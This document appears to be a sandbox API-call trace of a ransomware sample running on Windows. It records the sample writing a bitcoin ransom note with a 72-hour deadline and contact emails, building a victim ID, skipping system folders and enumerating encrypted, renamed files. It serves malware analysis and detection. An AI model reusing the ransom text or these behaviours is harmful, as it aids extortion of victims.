	[0175.579] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.579] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.579] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0175.580] CloseHandle (hObject=0x388) returned 1
	[0175.580] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.580] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.580] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.580] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0175.580] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.582] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.582] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0175.585] CloseHandle (hObject=0x388) returned 1
	[0175.586] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.586] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.587] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0175.588] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.588] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.588] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.589] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.589] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0175.589] CloseHandle (hObject=0x388) returned 1
	[0175.589] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x822cb646, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x822f173f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0175.590] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*") returned 84
	[0175.590] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.590] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*") returned 0x54
	[0175.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.590] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="windows") returned 0x0
	[0175.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="boot") returned 0x0
	[0175.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="system volume information") returned 0x0
	[0175.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="temp") returned 0x0
	[0175.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="program files") returned 0x0
	[0175.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="appdata") returned 0x0
	[0175.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="application data") returned 0x0
	[0175.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="winnt") returned 0x0
	[0175.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="tmp") returned 0x0
	[0175.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="cache") returned 0x0
	[0175.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="webcache") returned 0x0
	[0175.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="inetcache") returned 0x0
	[0175.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="nvidia") returned 0x0
	[0175.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.595] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="packages") returned 0x0
	[0175.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.595] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="cookies") returned 0x0
	[0175.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.595] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="programdata") returned 0x0
	[0175.595] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.596] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.596] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x822cb646, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x822f173f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0175.596] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.596] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8227f549, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8227f549, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8227f549, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xdb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0175.596] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822f173f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x822f173f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x823177df, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.596] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822cb646, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x822cb646, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x822f173f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.596] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822a551d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x822a551d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x822cb646, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0175.596] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.596] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0175.596] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0175.597] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}"
	[0175.597] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\"
	[0175.597] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov"
	[0175.597] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov"
	[0175.597] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\"
	[0175.597] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\"
	[0175.597] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*"
	[0175.597] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.603] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*") returned 89
	[0175.603] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.603] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*") returned 0x59
	[0175.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.603] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0175.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0175.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0175.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0175.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0175.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0175.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0175.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0175.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0175.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0175.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0175.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0175.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.609] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0175.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.609] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0175.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.609] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0175.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.609] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0175.609] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="..", cAlternateFileName="")) returned 1
	[0175.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0175.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0175.610] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0175.610] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0175.610] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\"
